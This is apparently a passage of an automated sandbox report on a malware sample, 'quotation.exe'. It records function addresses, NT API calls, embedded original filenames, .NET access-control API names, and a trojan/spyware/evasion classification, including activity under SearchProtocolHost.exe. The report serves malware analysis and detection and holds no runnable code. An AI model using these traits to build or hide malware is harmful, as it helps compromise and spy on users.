                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243010 NtOpenDirectoryObject,6_2_03243010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243090 NtSetValueKey,6_2_03243090
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243D10 NtOpenProcessToken,6_2_03243D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243D70 NtOpenThread,6_2_03243D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A393A0 NtCreateFile,6_2_02A393A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A396B0 NtClose,6_2_02A396B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A39610 NtDeleteFile,6_2_02A39610
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A39510 NtReadFile,6_2_02A39510
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A39820 NtAllocateVirtualMemory,6_2_02A39820
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC22900_2_02BC2290
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC08600_2_02BC0860
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC0FB00_2_02BC0FB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC73280_2_02BC7328
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC21EE0_2_02BC21EE
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BCA46B0_2_02BCA46B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC0A4D0_2_02BC0A4D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC2BD00_2_02BC2BD0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC2BC20_2_02BC2BC2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC08B00_2_02BC08B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC09580_2_02BC0958
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC0F040_2_02BC0F04
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC16280_2_02BC1628
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC36420_2_02BC3642
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC35480_2_02BC3548
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00418A933_2_00418A93
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0042F0D33_2_0042F0D3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_004028F03_2_004028F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_004031763_2_00403176
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_004011003_2_00401100
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_004031803_2_00403180
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_004103033_2_00410303
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040245D3_2_0040245D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_004024603_2_00402460
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00416C933_2_00416C93
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040E5193_2_0040E519
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_004105233_2_00410523
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040E5233_2_0040E523
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040E6673_2_0040E667
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040E6733_2_0040E673
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040E73B3_2_0040E73B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B01003_2_012B0100
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135A1183_2_0135A118
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013481583_2_01348158
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013801AA3_2_013801AA
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013741A23_2_013741A2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013781CC3_2_013781CC
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013520003_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137A3523_2_0137A352
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE3F03_2_012CE3F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013803E63_2_013803E6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013602743_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013402C03_2_013402C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C05353_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013805913_2_01380591
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013644203_2_01364420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013724463_2_01372446
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136E4F63_2_0136E4F6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C07703_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E47503_2_012E4750
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BC7C03_2_012BC7C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DC6E03_2_012DC6E0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D69623_2_012D6962
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A03_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0138A9A63_2_0138A9A6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CA8403_2_012CA840
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C28403_2_012C2840
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A68B83_2_012A68B8
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE8F03_2_012EE8F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137AB403_2_0137AB40
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01376BD73_2_01376BD7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA803_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135CD1F3_2_0135CD1F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CAD003_2_012CAD00
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D8DBF3_2_012D8DBF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BADE03_2_012BADE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0C003_2_012C0C00
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360CB53_2_01360CB5
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0CF23_2_012B0CF2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01362F303_2_01362F30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01302F283_2_01302F28
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E0F303_2_012E0F30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01334F403_2_01334F40
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133EFA03_2_0133EFA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CCFE03_2_012CCFE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B2FC83_2_012B2FC8
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137EE263_2_0137EE26
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0E593_2_012C0E59
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137CE933_2_0137CE93
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D2E903_2_012D2E90
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137EEDB3_2_0137EEDB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F516C3_2_012F516C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0138B16B3_2_0138B16B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AF1723_2_012AF172
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CB1B03_2_012CB1B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137F0E03_2_0137F0E0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013770E93_2_013770E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C70C03_2_012C70C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136F0CC3_2_0136F0CC
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137132D3_2_0137132D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AD34C3_2_012AD34C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0130739A3_2_0130739A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C52A03_2_012C52A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013612ED3_2_013612ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DB2C03_2_012DB2C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013775713_2_01377571
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135D5B03_2_0135D5B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013895C33_2_013895C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137F43F3_2_0137F43F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B14603_2_012B1460
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137F7B03_2_0137F7B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013056303_2_01305630
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013716CC3_2_013716CC
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013559103_2_01355910
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C99503_2_012C9950
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DB9503_2_012DB950
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132D8003_2_0132D800
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C38E03_2_012C38E0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137FB763_2_0137FB76
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DFB803_2_012DFB80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01335BF03_2_01335BF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012FDBF93_2_012FDBF9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01333A6C3_2_01333A6C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01377A463_2_01377A46
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137FA493_2_0137FA49
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01305AA03_2_01305AA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01361AA33_2_01361AA3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135DAAC3_2_0135DAAC
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136DAC63_2_0136DAC6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01377D733_2_01377D73
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C3D403_2_012C3D40
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01371D5A3_2_01371D5A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DFDC03_2_012DFDC0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01339C323_2_01339C32
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137FCF23_2_0137FCF2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137FF093_2_0137FF09
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137FFB13_2_0137FFB1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C1F923_2_012C1F92
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C9EB03_2_012C9EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CA3526_2_032CA352
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032D03E66_2_032D03E6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0321E3F06_2_0321E3F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032B02746_2_032B0274
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032902C06_2_032902C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032001006_2_03200100
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032AA1186_2_032AA118
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032981586_2_03298158
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032D01AA6_2_032D01AA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C81CC6_2_032C81CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032A20006_2_032A2000
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032107706_2_03210770
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032347506_2_03234750
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0320C7C06_2_0320C7C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0322C6E06_2_0322C6E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032105356_2_03210535
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032D05916_2_032D0591
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032B44206_2_032B4420
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C24466_2_032C2446
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032BE4F66_2_032BE4F6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CAB406_2_032CAB40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C6BD76_2_032C6BD7
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0320EA806_2_0320EA80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032269626_2_03226962
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032129A06_2_032129A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032DA9A66_2_032DA9A6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0321A8406_2_0321A840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032128406_2_03212840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_031F68B86_2_031F68B8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323E8F06_2_0323E8F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03252F286_2_03252F28
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03230F306_2_03230F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032B2F306_2_032B2F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03284F406_2_03284F40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0328EFA06_2_0328EFA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0321CFE06_2_0321CFE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03202FC86_2_03202FC8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CEE266_2_032CEE26
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03210E596_2_03210E59
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03222E906_2_03222E90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CCE936_2_032CCE93
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CEEDB6_2_032CEEDB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0321AD006_2_0321AD00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032ACD1F6_2_032ACD1F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03228DBF6_2_03228DBF
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0320ADE06_2_0320ADE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03210C006_2_03210C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032B0CB56_2_032B0CB5
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03200CF26_2_03200CF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C132D6_2_032C132D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_031FD34C6_2_031FD34C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0325739A6_2_0325739A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032152A06_2_032152A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032B12ED6_2_032B12ED
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0322B2C06_2_0322B2C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032DB16B6_2_032DB16B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0324516C6_2_0324516C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_031FF1726_2_031FF172
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0321B1B06_2_0321B1B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C70E96_2_032C70E9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CF0E06_2_032CF0E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032170C06_2_032170C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032BF0CC6_2_032BF0CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CF7B06_2_032CF7B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C16CC6_2_032C16CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C75716_2_032C7571
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032AD5B06_2_032AD5B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CF43F6_2_032CF43F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032014606_2_03201460
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CFB766_2_032CFB76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0322FB806_2_0322FB80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03285BF06_2_03285BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0324DBF96_2_0324DBF9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03283A6C6_2_03283A6C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CFA496_2_032CFA49
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C7A466_2_032C7A46
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03255AA06_2_03255AA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032ADAAC6_2_032ADAAC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032B1AA36_2_032B1AA3
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032BDAC66_2_032BDAC6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032A59106_2_032A5910
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032199506_2_03219950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0322B9506_2_0322B950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0327D8006_2_0327D800
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032138E06_2_032138E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CFF096_2_032CFF09
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CFFB16_2_032CFFB1
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03211F926_2_03211F92
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03219EB06_2_03219EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C7D736_2_032C7D73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03213D406_2_03213D40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032C1D5A6_2_032C1D5A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0322FDC06_2_0322FDC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03289C326_2_03289C32
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032CFCF26_2_032CFCF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A220106_2_02A22010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1CF006_2_02A1CF00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1B2646_2_02A1B264
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1B2706_2_02A1B270
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1B3386_2_02A1B338
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1B1206_2_02A1B120
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1D1206_2_02A1D120
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1B1166_2_02A1B116
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A256906_2_02A25690
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A238906_2_02A23890
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A3BCD06_2_02A3BCD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352E3586_2_0352E358
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352E4736_2_0352E473
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352CB786_2_0352CB78
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352CB356_2_0352CB35
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352E80E6_2_0352E80E
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352D8D86_2_0352D8D8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0328F290 appears 105 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 031FB970 appears 280 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 03245130 appears 58 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0327EA12 appears 86 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 03257E54 appears 102 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 012F5130 appears 58 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 01307E54 appears 111 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 0133F290 appears 105 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 012AB970 appears 280 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 0132EA12 appears 86 times
                Source: quotation.exe, 00000000.00000002.2087626887.0000000009AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2081981191.0000000001138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuZQt.exe0 vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2082562762.0000000002D39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2081873076.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2083220381.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2086657801.0000000007B50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs quotation.exe
                Source: quotation.exe, 00000000.00000000.2041027420.0000000000A02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuZQt.exe0 vs quotation.exe
                Source: quotation.exe, 00000003.00000002.2381927769.00000000013AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs quotation.exe
                Source: quotation.exeBinary or memory string: OriginalFilenameuZQt.exe0 vs quotation.exe
                Source: quotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, PhE7cd7e532AwGMfh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, PhE7cd7e532AwGMfh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, PhE7cd7e532AwGMfh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/13
                Source: C:\Users\user\Desktop\quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\quotation.exe.logJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile created: C:\Users\user\AppData\Local\Temp\sE716IK71MJump to behavior
                Source: quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: quotation.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
